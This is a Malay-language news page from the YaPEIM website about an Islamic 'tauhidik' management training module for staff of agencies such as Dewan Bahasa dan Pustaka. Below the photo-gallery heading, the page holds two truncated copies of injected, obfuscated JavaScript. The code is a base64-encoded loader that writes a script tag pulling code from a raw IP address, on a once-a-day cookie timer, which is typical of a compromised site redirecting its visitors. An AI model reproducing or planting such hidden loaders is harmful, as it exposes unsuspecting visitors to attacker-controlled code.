YaPEIM » YaPEIM Perkenal Modul Pengurusan Tauhidik

Terkini

YaPEIM Perkenal Modul Pengurusan Tauhidik

Program Tauhidik di Dewan Bahasa dan Pustaka yang disampaikan oleh Abu Faiz

Model pembangunan di negara ini sejak merdeka memberi pendekatan spiritual sebagai antara elemen utama seperti dalam prinsip pertama Rukun Negara, ‘Kepercayaan kepada Tuhan’.

Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) melalui Akademi Pengurusannya menawarkan modul pengurusan tauhidik yang menyepadukan ilmu naqli dan aqli, warisan dan wawasan bagi menjana jiwa yang meletakkan Allah SWT sebagai kiblat utama kehidupan.

Modul yang digubal barisan panel disertai Presiden YaPEIM, Datuk Abd Malek Awang Kechil, dibahagikan kepada lima bahagian utama bertujuan menerapkan pandangan (tasawwur) Islam berasaskan paksi tauhid, etos kerja Islam, kepemimpinan dan kepengikutan, syura dan amal jamai.

Pemangku Pengurus Akademi, Nurul Hakim Che Abd Aziz, berkata banyak agensi kerajaan memilih modul pengurusan tauhidik untuk dilaksanakan dalam kursus staf kerana kesannya mampu mengubah kakitangan, pengurusan dan produktiviti agensi.

“Jika dulu mereka bekerja hanya untuk mencari makan semata-mata, tetapi melalui latihan menggunakan modul pengurusan tauhidik, niat dan tasawwur mengenai alam kehidupan mereka berubah sehingga terjelma kepada tindakan serta amalan.

“Melalui maklum balas diterima daripada peserta yang mengikuti kursus ini selama dua hari,  mereka mahu kursus ini dipanjangkan masa,” katanya.

Versi Bahasa Inggeris

Modul pengurusan tauhidik yang diterbitkan Akademi Pengurusan YaPEIM (APY) sejak 2001 turut dibangunkan dalam versi bahasa Inggeris supaya dapat diguna pakai agensi swasta dan luar negara yang memilih medium bahasa berkenaan.

“APY akan perluaskan serta memperkenalkan modul itu di luar negara dengan melatih lebih ramai fasilitator serta pengendali yang boleh menerapkan modul berkenaan kepada peserta.

Nurul Hakim berkata,  perubahan kepada budaya organisasi juga lebih mudah berlaku jika latihan dibuat merangkumi keseluruhan staf mulai pengurusan atasan sehinggalah kepada pegawai dan kumpulan sokongan, seperti dilaksanakan Dewan Bahasa dan Pustaka (DBP).

Kurusus berkenaan dikendalikan pensyarah Teologi dan Falsafah dan Sarjana dalam bidang Dakwah dan Kepimpinan dari Universiti Kebangsaan Malaysia (UKM), Jaafar Muhammad.

Beliau berkata, berasaskan kalimah tauhid yang merangkumi tauhid rubbubiyah dan tauhid uluhiah memberi implikasi Allah SWT satu-satunya tumpuan rasa hormat, syukur, cinta, takut, setia, pengabdian dan kebaktian yang perlu diterapkan dalam kerja harian.

“Pandangan kita pun perlu diperluaskan sehingga membawa keyakinan sebagai hamba Allah dengan mempamerkan dalam bentuk bukti atau saksi sebagai hamba Allah dalam amal ibadah seperti solat serta perbuatan harian lain,” katanya.– Berita Harian.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top